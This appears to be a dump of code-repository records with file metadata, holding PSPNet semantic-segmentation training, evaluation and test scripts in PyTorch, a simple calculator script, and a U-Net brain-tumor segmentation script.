data.DataLoader(VOCDataSet(args.data_dir, args.data_list, max_iters=None, crop_size=input_size, \n scale=args.random_scale, mirror=args.random_mirror, mean=args.img_mean), \n batch_size= args.batch_size, shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n elif args.dataset == 'cityscapes':\n trainloader = data.DataLoader(CityscapesDataSet(args.data_dir, args.data_list, max_iters=None, crop_size=input_size, \n scale=args.random_scale, mirror=args.random_mirror, mean=args.img_mean), \n batch_size = args.batch_size, shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n\n else:\n print(\"dataset error\")\n\n optimizer = optim.SGD([{'params': get_1x_lr_params_NOscale(model), 'lr': args.learning_rate }, \n {'params': get_10x_lr_params(model), 'lr': 10*args.learning_rate}], \n lr=args.learning_rate, momentum=args.momentum,weight_decay=args.weight_decay)\n optimizer.zero_grad()\n\n\n \n logFileLoc = args.snapshot_dir + args.logFile\n if os.path.isfile(logFileLoc):\n logger = open(logFileLoc, 'a')\n else:\n logger = open(logFileLoc, 'w')\n logger.write(\"Parameters: %s\" % (str(total_paramters)))\n logger.write(\"\\n%s\\t\\t%s\" % ('iter', 'Loss(train)\\n'))\n logger.flush()\n\n print(\"=====> Begin to train\")\n train_len=len(trainloader)\n print(\" iteration numbers of per epoch: \", train_len)\n print(\" epoch num: \", args.maxEpoches)\n print(\" max iteration: \", args.maxEpoches*train_len)\n for epoch in range(start_epoch, int(args.maxEpoches)):\n \n for i_iter, batch in enumerate(trainloader,0): #i_iter from 0 to len-1\n #print(\"i_iter=\", i_iter, \"epoch=\", epoch)\n images, labels, _, _ = batch\n 
images = Variable(images).cuda()\n\n optimizer.zero_grad()\n lr = adjust_learning_rate(optimizer, i_iter+epoch*train_len, \n max_iter = args.maxEpoches * train_len)\n pred = model(images)\n print(\"model output size: \", pred.size())\n loss = loss_calc(pred, labels)\n loss.backward()\n optimizer.step()\n \n print(\"===> Epoch[{}]({}/{}): Loss: {:.10f} lr: {:.5f}\".format(epoch, i_iter, train_len, loss.data[0], lr))\n logger.write(\"Epoch[{}]({}/{}): Loss: {:.10f} lr: {:.5f}\\n\".format(epoch, i_iter, train_len, loss.data[0], lr))\n logger.flush()\n \n print(\"=====> saving model\")\n state={\"epoch\": epoch+1, \"model\": model.state_dict()}\n torch.save(state, osp.join(args.snapshot_dir, 'psp_'+str(args.dataset)+\"_\"+str(epoch)+'.pth'))\n\n\n end = timeit.default_timer()\n print( float(end-start)/3600, 'h')\n logger.write(\"total training time: {:.2f} h\\n\".format(float(end-start)/3600))\n logger.close()\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.621669352054596, "alphanum_fraction": 0.645075798034668, "avg_line_length": 43.110389709472656, "blob_id": "1c12c6d670f8a5058639269cafddb19b12e2f034", "content_id": "9410a9d923953fe91a391d1869b9100d70716c29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6793, "license_type": "no_license", "max_line_length": 135, "num_lines": 154, "path": "/test.py", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "import torch\nimport argparse\nimport scipy\nfrom scipy import ndimage\nimport numpy as np\nimport sys\nimport cv2\nfrom torch.autograd import Variable\nimport torchvision.models as models\nimport torch.nn.functional as F\nfrom torch.utils import data\nfrom psp.model import PSPNet\nfrom psp.voc12_datasets import VOCDataTestSet\nfrom psp.cityscapes_datasets import CityscapesTestDataSet\nfrom collections import OrderedDict\nfrom utils.colorize_mask import cityscapes_colorize_mask, VOCColorize\nimport os\nfrom PIL import Image\n\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\n\n\ndef get_arguments():\n \"\"\"Parse all the arguments provided from the CLI.\n \n Returns:\n A list of parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"PSPnet\")\n parser.add_argument(\"--dataset\", type=str, default='cityscapes',\n help=\"voc12, cityscapes, or pascal-context\")\n\n # GPU configuration\n parser.add_argument(\"--cuda\", default=True, help=\"Run on CPU or GPU\")\n parser.add_argument(\"--gpus\", type=str, default=\"3\",\n help=\"choose gpu device.\")\n return parser.parse_args()\n\ndef configure_dataset_model(args):\n if args.dataset == 'voc12':\n args.data_dir ='/home/wty/AllDataSet/VOC2012' #Path to the directory containing the PASCAL VOC dataset\n args.data_list = './dataset/list/VOC2012/test.txt' #Path to the file listing the images in the dataset\n args.img_mean = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32) \n #RBG mean, first subtract mean and then change to BGR\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.num_classes = 21 #Number of classes to predict (including background)\n args.restore_from = './snapshots/voc12/psp_voc12_14.pth' #Where restore model parameters from\n args.save_segimage = True\n args.seg_save_dir = \"./result/test/VOC2012\"\n args.corp_size =(505, 505)\n \n elif args.dataset == 'cityscapes':\n args.data_dir ='/home/wty/AllDataSet/CityScapes' #Path to the directory containing the PASCAL VOC dataset\n args.data_list = 
'./dataset/list/Cityscapes/cityscapes_test_list.txt' #Path to the file listing the images in the dataset\n args.img_mean = np.array((73.15835921, 82.90891754, 72.39239876), dtype=np.float32)\n #RBG mean, first subtract mean and then change to BGR\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.f_scale = 1 #resize image, and Unsample model output to original image size, label keeps\n args.num_classes = 19 #Number of classes to predict (including background)\n args.restore_from = './snapshots/cityscapes/psp_cityscapes_59.pth' #Where restore model parameters from\n args.save_segimage = True\n args.seg_save_dir = \"./result/test/Cityscapes\"\n else:\n print(\"dataset error\")\n\ndef convert_state_dict(state_dict):\n \"\"\"Converts a state dict saved from a dataParallel module to normal \n module state_dict inplace\n :param state_dict is the loaded DataParallel model_state\n You probably saved the model using nn.DataParallel, which stores the model in module, and now you are trying to load it \n without DataParallel. You can either add a nn.DataParallel temporarily in your network for loading purposes, or you can \n load the weights file, create a new ordered dict without the module prefix, and load it back \n \"\"\"\n state_dict_new = OrderedDict()\n #print(type(state_dict))\n for k, v in state_dict.items():\n #print(k)\n name = k[7:] # remove the prefix module.\n # My heart is borken, the pytorch have no ability to do with the problem.\n state_dict_new[name] = v\n return state_dict_new\n\n\ndef main():\n args = get_arguments()\n print(\"=====> Configure dataset and model\")\n configure_dataset_model(args)\n print(args)\n\n print(\"=====> Set GPU for training\")\n if args.cuda:\n print(\"====> Use gpu id: '{}'\".format(args.gpus))\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\n if not torch.cuda.is_available():\n raise Exception(\"No GPU found or Wrong gpu id, please run without --cuda\")\n model = PSPNet(num_classes=args.num_classes)\n \n saved_state_dict = torch.load(args.restore_from)\n model.load_state_dict( convert_state_dict(saved_state_dict[\"model\"]) )\n\n model.eval()\n model.cuda()\n if args.dataset == 'voc12':\n testloader = data.DataLoader(VOCDataTestSet(args.data_dir, args.data_list, crop_size=(505, 505),mean= args.img_mean), \n batch_size=1, shuffle=False, pin_memory=True)\n interp = nn.Upsample(size=(505, 505), mode='bilinear')\n voc_colorize = VOCColorize()\n elif args.dataset == 'cityscapes':\n testloader = data.DataLoader(CityscapesTestDataSet(args.data_dir, args.data_list, f_scale= args.f_scale, mean= args.img_mean), \n batch_size=1, shuffle=False, pin_memory=True) # f_sale, meaning resize image at f_scale as input\n interp = nn.Upsample(size=(1024, 2048), mode='bilinear') #size = (h,w)\n else:\n print(\"dataset error\")\n\n data_list = []\n\n if args.save_segimage:\n if not os.path.exists(args.seg_save_dir):\n os.makedirs(args.seg_save_dir)\n print(\"======> test set size:\", len(testloader))\n for index, batch in enumerate(testloader):\n print('%d processd'%(index))\n image, size, name = batch\n size = size[0].numpy()\n output = model(Variable(image, volatile=True).cuda())\n\n output = interp(output).cpu().data[0].numpy()\n\n if args.dataset == 'voc12':\n print(output.shape)\n print(size)\n output = output[:,:size[0],:size[1]]\n output = output.transpose(1,2,0)\n output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)\n if args.save_segimage:\n seg_filename = os.path.join(args.seg_save_dir, '{}.png'.format(name[0]))\n 
color_file = Image.fromarray(voc_colorize(output).transpose(1, 2, 0), 'RGB')\n color_file.save(seg_filename)\n\n elif args.dataset == 'cityscapes':\n output = output.transpose(1,2,0)\n output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)\n if args.save_segimage:\n output_color = cityscapes_colorize_mask(output)\n output = Image.fromarray(output)\n output.save('%s/%s.png'% (args.seg_save_dir, name[0]))\n output_color.save('%s/%s_color.png'%(args.seg_save_dir, name[0]))\n else:\n print(\"dataset error\")\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6074672341346741, "alphanum_fraction": 0.6367305517196655, "avg_line_length": 33.17241287231445, "blob_id": "d91c39b3cd7b363bfe281249e87413bd1e0ac01d", "content_id": "6fdc7383f5f6abc37423a2f44e6f3e1334a5ee96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 991, "license_type": "no_license", "max_line_length": 227, "num_lines": 29, "path": "/README.md", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "# PSPNet_PyTorch\nAn implementation of PSPNet: [Pyramid Scene Parsing Network](http://arxiv.org/abs/1612.01105), CVPR2017\n\n### Training\n\nYou can download pretrained model on COCO [here](https://pan.baidu.com/s/1iLGtw1byy0rIIZJ5MHrpOg) for training on VOC2012 and pretrained model [here](https://pan.baidu.com/s/1vTdzYcTnfJ2XT2996JZedg) for training on Cityscapes.\n\n```\nusage: train.py [-h] [--is-training] [--learning-rate LEARNING_RATE]\n [--weight-decay WEIGHT_DECAY] [--momentum MOMENTUM]\n [--power POWER] [--dataset DATASET] [--random-mirror]\n [--random-scale] [--not-restore-last]\n [--random-seed RANDOM_SEED] [--logFile LOGFILE] [--cuda CUDA]\n [--gpus GPUS]\n\n\nexmaple: train.py --dataset voc12\n```\n### Evaluation (on val set)\n\n```\nusage: evaluate.py [-h] [--dataset DATASET] [--cuda CUDA] [--gpus GPUS]\n\n```\n\n### Testing (on test set)\n```\nusage: test.py [-h] [--dataset DATASET] [--cuda CUDA] [--gpus GPUS]\n```\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 41, "blob_id": "01b2b4b0bcc59ad796b63f825a39be818cca0fea", "content_id": "caf3eb6eb39fdfa590661e5ae8e41aa4469f3295", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 42, "license_type": "no_license", "max_line_length": 41, "num_lines": 1, "path": "/dataset/list/Cityscapes/README.md", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": ".txt file for train, train_val, val, test\n" }, { "alpha_fraction": 0.5827134847640991, "alphanum_fraction": 0.6166579127311707, "avg_line_length": 41.61160659790039, "blob_id": "58a380b36ae82c7125fa6faf340eecdb19ed002d", "content_id": "ee31b92d81d088434b76df4126a7e422c39f7a2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9545, "license_type": "no_license", "max_line_length": 133, "num_lines": 224, "path": "/evaluate.py", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "import torch\nimport argparse\nimport scipy\nfrom scipy import ndimage\nimport numpy as np\nimport sys\nimport cv2\nfrom torch.autograd import Variable\nimport torchvision.models as models\nimport torch.nn.functional as F\nfrom torch.utils import data\nfrom psp.model import PSPNet\nfrom psp.voc12_datasets import VOCDataSet\nfrom psp.cityscapes_datasets import CityscapesValDataSet\nfrom collections import OrderedDict\nfrom 
utils.colorize_mask import cityscapes_colorize_mask, VOCColorize\nimport os\nfrom PIL import Image\n\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport time\n\n\ndef get_arguments():\n \"\"\"Parse all the arguments provided from the CLI.\n \n Returns:\n A list of parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"PSPnet\")\n parser.add_argument(\"--dataset\", type=str, default='cityscapes',\n help=\"voc12, cityscapes, or pascal-context\")\n \n # GPU configuration\n parser.add_argument(\"--cuda\", default=True, help=\"Run on CPU or GPU\")\n parser.add_argument(\"--gpus\", type=str, default=\"3\",\n help=\"choose gpu device.\")\n return parser.parse_args()\n\ndef configure_dataset_model(args):\n if args.dataset == 'voc12':\n args.data_dir ='/home/wty/AllDataSet/VOC2012' #Path to the directory containing the PASCAL VOC dataset\n args.data_list = './dataset/list/VOC2012/val.txt' #Path to the file listing the images in the dataset\n args.img_mean = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32) \n #RBG mean, first subtract mean and then change to BGR\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.num_classes = 21 #Number of classes to predict (including background)\n args.restore_from = './snapshots/voc12/psp_voc12_10.pth' #Where restore model parameters from\n args.save_segimage = True\n args.seg_save_dir = \"./result/val/VOC2012\"\n args.corp_size =(505, 505)\n \n elif args.dataset == 'cityscapes':\n args.data_dir ='/home/wty/AllDataSet/CityScapes' #Path to the directory containing the PASCAL VOC dataset\n args.data_list = './dataset/list/Cityscapes/cityscapes_val_list.txt' #Path to the file listing the images in the dataset\n args.img_mean = np.array((73.15835921, 82.90891754, 72.39239876), dtype=np.float32)\n #RBG mean, first subtract mean and then change to BGR\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.num_classes = 19 #Number of classes to predict (including background)\n args.f_scale = 1 #resize image, and Unsample model output to original image size\n args.restore_from = './snapshots/cityscapes/psp_cityscapes_20.pth' #Where restore model parameters from\n #args.restore_from = './pretrained/resnet101_pretrained_for_cityscapes.pth' #Where restore model parameters from\n args.save_segimage = True\n args.seg_save_dir = \"./result/val/Cityscapes\"\n else:\n print(\"dataset error when configuring dataset and model\")\n\ndef convert_state_dict(state_dict):\n \"\"\"Converts a state dict saved from a dataParallel module to normal \n module state_dict inplace\n :param state_dict is the loaded DataParallel model_state\n You probably saved the model using nn.DataParallel, which stores the model in module, and now you are trying to load it \n without DataParallel. 
You can either add a nn.DataParallel temporarily in your network for loading purposes, or you can \n load the weights file, create a new ordered dict without the module prefix, and load it back \n \"\"\"\n state_dict_new = OrderedDict()\n #print(type(state_dict))\n for k, v in state_dict.items():\n #print(k)\n name = k[7:] # remove the prefix module.\n # My heart is borken, the pytorch have no ability to do with the problem.\n state_dict_new[name] = v\n return state_dict_new\n\ndef get_iou(data_list, class_num, save_path=None):\n from multiprocessing import Pool \n from psp.metric import ConfusionMatrix\n\n ConfM = ConfusionMatrix(class_num)\n f = ConfM.generateM\n pool = Pool() \n m_list = pool.map(f, data_list)\n pool.close() \n pool.join() \n \n for m in m_list:\n ConfM.addM(m)\n\n aveJ, j_list, M = ConfM.jaccard()\n print('meanIOU: ' + str(aveJ) + '\\n')\n if save_path:\n with open(save_path, 'w') as f:\n f.write('meanIOU: ' + str(aveJ) + '\\n')\n f.write(str(j_list)+'\\n')\n f.write(str(M)+'\\n')\n\ndef show_all(gt, pred):\n import matplotlib.pyplot as plt\n from matplotlib import colors\n from mpl_toolkits.axes_grid1 import make_axes_locatable\n\n fig, axes = plt.subplots(1, 2)\n ax1, ax2 = axes\n\n classes = np.array(('background', # always index 0\n 'aeroplane', 'bicycle', 'bird', 'boat',\n 'bottle', 'bus', 'car', 'cat', 'chair',\n 'cow', 'diningtable', 'dog', 'horse',\n 'motorbike', 'person', 'pottedplant',\n 'sheep', 'sofa', 'train', 'tvmonitor'))\n colormap = [(0,0,0),(0.5,0,0),(0,0.5,0),(0.5,0.5,0),(0,0,0.5),(0.5,0,0.5),(0,0.5,0.5), \n (0.5,0.5,0.5),(0.25,0,0),(0.75,0,0),(0.25,0.5,0),(0.75,0.5,0),(0.25,0,0.5), \n (0.75,0,0.5),(0.25,0.5,0.5),(0.75,0.5,0.5),(0,0.25,0),(0.5,0.25,0),(0,0.75,0), \n (0.5,0.75,0),(0,0.25,0.5)]\n cmap = colors.ListedColormap(colormap)\n bounds=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]\n norm = colors.BoundaryNorm(bounds, cmap.N)\n\n ax1.set_title('gt')\n ax1.imshow(gt, cmap=cmap, norm=norm)\n\n ax2.set_title('pred')\n ax2.imshow(pred, cmap=cmap, norm=norm)\n\n plt.show()\n\ndef main():\n args = get_arguments()\n print(\"=====> Configure dataset and model\")\n configure_dataset_model(args)\n print(args)\n\n print(\"=====> Set GPU for training\")\n if args.cuda:\n print(\"====> Use gpu id: '{}'\".format(args.gpus))\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\n if not torch.cuda.is_available():\n raise Exception(\"No GPU found or Wrong gpu id, please run without --cuda\")\n \n model = PSPNet(num_classes=args.num_classes)\n \n saved_state_dict = torch.load(args.restore_from)\n if args.dataset == 'voc12':\n model.load_state_dict( convert_state_dict(saved_state_dict[\"model\"]) )\n elif args.dataset == 'cityscapes':\n #model.load_state_dict(saved_state_dict[\"model\"])\n model.load_state_dict( convert_state_dict(saved_state_dict[\"model\"]) )\n else:\n print(\"dataset error when loading model file\")\n\n model.eval()\n model.cuda()\n if args.dataset == 'voc12':\n testloader = data.DataLoader(VOCDataSet(args.data_dir, args.data_list, crop_size=(505, 505), \n mean= args.img_mean, scale=False, mirror=False), \n batch_size=1, shuffle=False, pin_memory=True)\n interp = nn.Upsample(size=(505, 505), mode='bilinear')\n voc_colorize = VOCColorize()\n elif args.dataset == 'cityscapes':\n testloader = data.DataLoader(CityscapesValDataSet(args.data_dir, args.data_list, f_scale=args.f_scale, mean= args.img_mean), \n batch_size=1, shuffle=False, pin_memory=True) # f_sale, meaning resize image at f_scale as input\n interp = nn.Upsample(size=(1024, 
2048), mode='bilinear') #size = (h,w)\n else:\n print(\"dataset error when configure DataLoader\")\n\n data_list = []\n\n if args.save_segimage:\n if not os.path.exists(args.seg_save_dir):\n os.makedirs(args.seg_save_dir)\n\n for index, batch in enumerate(testloader):\n image, label, size, name = batch\n #print(\"label.size:\", label.size())\n #print(\"model input image size:\", image.size())\n size = size[0].numpy()\n start_time = time.time()\n output = model(Variable(image, volatile=True).cuda())\n\n output = interp(output).cpu().data[0].numpy()\n\n time_taken = time.time() - start_time;\n print('%d processd, time: %.3f'%(index, time_taken))\n\n if args.dataset == 'voc12':\n output = output[:,:size[0],:size[1]]\n gt = np.asarray(label[0].numpy()[:size[0],:size[1]], dtype=np.int)\n output = output.transpose(1,2,0)\n output = np.asarray(np.argmax(output, axis=2), dtype=np.int)\n data_list.append([gt.flatten(), output.flatten()])\n if args.save_segimage:\n seg_filename = os.path.join(args.seg_save_dir, '{}.png'.format(name[0]))\n color_file = Image.fromarray(voc_colorize(output).transpose(1, 2, 0), 'RGB')\n color_file.save(seg_filename)\n\n elif args.dataset == 'cityscapes':\n gt = np.asarray(label[0].numpy(), dtype=np.int)\n output = output.transpose(1,2,0)\n output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)\n data_list.append([gt.flatten(), output.flatten()])\n if args.save_segimage:\n output_color = cityscapes_colorize_mask(output)\n output = Image.fromarray(output)\n output.save('%s/%s.jpg'% (args.seg_save_dir, name[0]))\n output_color.save('%s/%s_color.png'%(args.seg_save_dir, name[0]))\n else:\n print(\"dataset error\")\n\n get_iou(data_list, args.num_classes)\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.719298243522644, "alphanum_fraction": 0.719298243522644, "avg_line_length": 56, "blob_id": "c4a44a650ca170d6f04f157c2db98123a09d79cf", "content_id": "cc1855e5502d00beeaa90b050b9a8afeef30530b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 57, "license_type": "no_license", "max_line_length": 56, "num_lines": 1, "path": "/dataset/list/VOC2012/README.md", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": ".txt file for train, train_aug, train_aug_val, val, test\n" }, { "alpha_fraction": 0.5126475691795349, "alphanum_fraction": 0.520236074924469, "avg_line_length": 25.35555648803711, "blob_id": "1a18515418a0a939122336f45af7a9bcaeaba319", "content_id": "761d6e191056d4dcdbe20e973e07212f25644dba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1186, "license_type": "no_license", "max_line_length": 74, "num_lines": 45, "path": "/plot_curve.py", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "import os\nimport matplotlib.pyplot as plt\n\ndef loss_plot(loss_seq,lr_seq, path = 'Train_hist.png', model_name = ''):\n x = range(len(loss_seq))\n\n y1 = loss_seq\n y2 = lr_seq\n\n plt.plot(x, y1, label='loss')\n plt.plot(x, y2, label='lr')\n\n plt.xlabel('Iter')\n plt.ylabel('Loss')\n\n plt.legend(loc=4)\n plt.grid(True)\n plt.tight_layout()\n plt.savefig(path)\n\n #plt.close()\n print(\"finish\")\n plt.show()\n plt.close()\n\nif __name__ == '__main__':\n log_file = \"./snapshots/voc12/log.txt\"\n log_data_list = [item.strip() for item in open(log_file, 'r')]\n length = len(log_data_list)\n print(\"the number of records:\", length)\n\n loss_seq =[]\n lr_seq =[]\n for item in 
log_data_list:\n print( item.split())\n if len(item.split())==5 :\n if item.split()[3]==\"lr:\":\n _, _, loss_val,_, lr = item.split()\n loss_val = float(loss_val)\n lr = float(lr)\n loss_seq.append(loss_val)\n lr_seq.append(lr)\n print(\"loss_val:\", loss_val)\n print(\"lr:\", lr)\n loss_plot(loss_seq, lr_seq, path = 'Train_hist.png', model_name = '')\n" } ]
9
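train.py in the record above decays the learning rate with the polynomial schedule lr = base_lr * (1 - iter/max_iter)^power and gives the PSP head 10x the base rate. A small numeric illustration of that schedule, using the base_lr=0.001 and power=0.9 defaults from the file (the 90000-iteration horizon matches the file's comment about ~90k iterations on Cityscapes):

    def lr_poly(base_lr, it, max_iter, power):
        # polynomial decay as defined in the record's train.py
        return base_lr * ((1 - float(it) / max_iter) ** power)

    # lr_poly(0.001, 0,     90000, 0.9) -> 0.001      (start of training)
    # lr_poly(0.001, 45000, 90000, 0.9) -> ~0.000536  (halfway)
    # lr_poly(0.001, 89999, 90000, 0.9) -> ~3.5e-08   (last step)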
pydeveloperashish/Membership-Materials
https://github.com/pydeveloperashish/Membership-Materials
b6dd799ca5072417ac8caf6c22b7f299126f64d8
5c012b2b2c9d9ccd9242aa32370f0e5c9d29d1db
5cd85595927d619d9e48561718b44782090333de
refs/heads/main
2023-04-09T02:05:15.480360
2021-04-25T09:56:27
2021-04-25T09:56:27
354,558,038
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5382165312767029, "alphanum_fraction": 0.5605095624923706, "avg_line_length": 17.038461685180664, "blob_id": "32a6da64d59d69df95744efb11d85deae515e23b", "content_id": "c16bf5bcf5aae3761e05a2e5b15e1c24e53c0079", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 942, "license_type": "no_license", "max_line_length": 104, "num_lines": 52, "path": "/Calculater.py", "repo_name": "pydeveloperashish/Membership-Materials", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nx=int(input(\"Enter the value of X: \"))\ny=int(input(\"Enter the value of y: \"))\n\nfunction=int(input(\"press 1 for add, press 2 for sub, press 3 for mult, press 4 for div: \"))\n\nchoices=[1,2,3,4]\n\ndef add(x,y):\n    return print(x+y)\n\ndef sub(x,y):\n    return print(x-y)\n\ndef mult(x,y):\n    return print(x*y)\n\ndef div(x,y):\n    if y == 0:\n        return print(\"cannot divide by zero\")\n    return print(x/y)\n    \nif function not in choices:\n    for i in range(1,4):\n        if function not in choices:\n            print(\"invalid number\")\n            function=int(input(\"press 1 for add, press 2 for sub, press 3 for mult, press 4 for div: \"))\n            if i==3 and function not in choices:\n                print(\"You have reached the limit of invalid attempts\")\n        else:\n            break\n        \nif function==1:\n    add(x,y)\n    \nelif function==2:\n    sub(x,y)\n    \nelif function==3:\n    mult(x,y)\n    \nelif function==4:\n    div(x,y)\n    \n\n    \n\n\n# In[ ]:\n\n\n\n\n" } ]
1
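Calculater.py above dispatches on the menu choice with an if/elif chain; a dictionary from choice to function expresses the same dispatch without a silent fall-through for invalid input. A sketch of that variant (function names follow the record; returning None for a bad choice is a choice made here, not in the original):

    def add(x, y): return x + y
    def sub(x, y): return x - y
    def mult(x, y): return x * y
    def div(x, y): return x / y if y != 0 else None   # avoid ZeroDivisionError

    ops = {1: add, 2: sub, 3: mult, 4: div}

    def calculate(choice, x, y):
        op = ops.get(choice)          # None when the choice is not 1-4
        return op(x, y) if op else None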
Yi-YunSung/109-2MachineLearning
https://github.com/Yi-YunSung/109-2MachineLearning
5ce9e7988478a9577379acedb56e232e0306f81b
3801d52b51d2f3a52dc7c7d1cbc0f58a6577d2b7
320e5f52eab0ef2ee6975b2fa0c63404e0dcebf3
refs/heads/main
2023-06-06T12:06:25.372380
2021-06-27T15:24:26
2021-06-27T15:24:26
350,223,333
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6164073348045349, "alphanum_fraction": 0.6679256558418274, "avg_line_length": 39.89240646362305, "blob_id": "2c12e7b6fafebfd40bf330095181fea534b131d2", "content_id": "00c665ffbf7e66f14d42d76092d745fed3549bcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6753, "license_type": "no_license", "max_line_length": 101, "num_lines": 158, "path": "/hw4_group6/hw4_group6_braintumor.py", "repo_name": "Yi-YunSung/109-2MachineLearning", "src_encoding": "UTF-8", "text": "import os\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport glob\r\nimport SimpleITK as sitk\r\nfrom scipy import ndimage\r\nimport matplotlib.pyplot as plt\r\n\r\n# read training files\r\ntrain_image_path = 'C:/Users/User/Downloads/train_image'\r\ntrain_image_filelist = os.listdir(train_image_path)\r\ntrain_label_path = 'C:/Users/User/Downloads/train_label'\r\ntrain_label_filelist = os.listdir(train_label_path)\r\n\r\n# read one volume\r\nori_data = sitk.ReadImage(os.path.join(train_image_path, train_image_filelist[1]))\r\ndata1 = sitk.GetArrayFromImage(ori_data) # get the data as a numpy array\r\n# print the data name, shape, and the element value at one position (z,y,x)\r\nprint(train_image_filelist[1], data1.shape, data1[38,255,255])\r\nplt.imshow(data1[60,:,:]) # visualize slice 60\r\nplt.show()\r\n\r\n# read test files\r\ntest_image_path = 'C:/Users/User/Downloads/test_image'\r\ntest_image_filelist = os.listdir(test_image_path)\r\n\r\n\r\n\r\n# convert training files\r\ndef load_train_data(path):\r\n    train_image_dir = sorted(train_image_filelist)\r\n    data = []\r\n    for p in tqdm(train_image_dir):\r\n        img_itk = sitk.ReadImage(path + '/'+ p) # read each scan by its own filename\r\n        flair = sitk.GetArrayFromImage(img_itk)\r\n        data.append([flair])\r\n    data = np.asarray(data, dtype=np.float16)\r\n    return data\r\ndef load_train_label_data(path):\r\n    train_label_dir = sorted(train_label_filelist)\r\n    gt = []\r\n    for p in tqdm(train_label_dir):\r\n        img_itk = sitk.ReadImage(path + '/'+ p) # read each label volume by its own filename\r\n        seg = sitk.GetArrayFromImage(img_itk)\r\n        gt.append(seg)\r\n    gt = np.asarray(gt, dtype=np.float16)\r\n    return gt\r\ndata1 = load_train_data(train_image_path)\r\ngt1 = load_train_label_data(train_label_path)\r\nnp.save('data1', data1)\r\nnp.save('gt1',gt1)\r\n\r\n# convert test files\r\ndef load_test_data(path):\r\n    test_image_dir = sorted(test_image_filelist)\r\n    data = []\r\n    for p in tqdm(test_image_dir):\r\n        img_itk = sitk.ReadImage(path + '/'+ p) # read each scan by its own filename\r\n        flair = sitk.GetArrayFromImage(img_itk)\r\n        data.append([flair])\r\n    data = np.asarray(data, dtype=np.float16)\r\n    return data\r\n#data2 = load_test_data(test_image_path)\r\n#np.save('data2', data2)\r\n\r\n#load npy\r\ndata = np.load('C:/Users/User/PycharmProjects/shopee/data1.npy')\r\ndata = np.transpose(data,(0,2,3,4,1))\r\nX_train = data[:,30:60,30:150,30:150,:].reshape([-1,200,200,1])\r\nprint(X_train.shape)\r\ndata = np.load('C:/Users/User/PycharmProjects/shopee/gt1.npy')\r\ny_train = data[:,30:60,30:150,30:150].reshape([-1,200,200,1])\r\nprint(y_train.shape)\r\ndata = np.load('C:/Users/User/PycharmProjects/shopee/data2.npy')\r\ndata = np.transpose(data,(0,2,3,4,1))\r\nX_test = data[:,30:50,30:85,30:85,:].reshape([-1,200,200,1])\r\nprint(X_test.shape)\r\n\r\n# normalization\r\nfrom keras.utils import to_categorical\r\ny_train = to_categorical(y_train)\r\nX_train = (X_train-np.mean(X_train))/np.max(X_train)\r\nX_test = (X_test-np.mean(X_test))/np.max(X_test)\r\n\r\n# build the model\r\nimport numpy as np\r\nimport
os\r\nimport skimage.io as io\r\nimport skimage.transform as trans\r\nimport numpy as np\r\nfrom keras.models import *\r\nfrom keras.layers import *\r\nfrom keras.optimizers import *\r\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\r\nfrom keras import backend as keras\r\ndef unet(pretrained_weights=None, input_size=(200, 200, 1)):\r\n inputs = Input(input_size)\r\n conv1 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal')(inputs)\r\n conv1 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)\r\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\r\n conv2 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)\r\n conv2 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)\r\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\r\n conv3 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)\r\n conv3 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)\r\n pool3 = 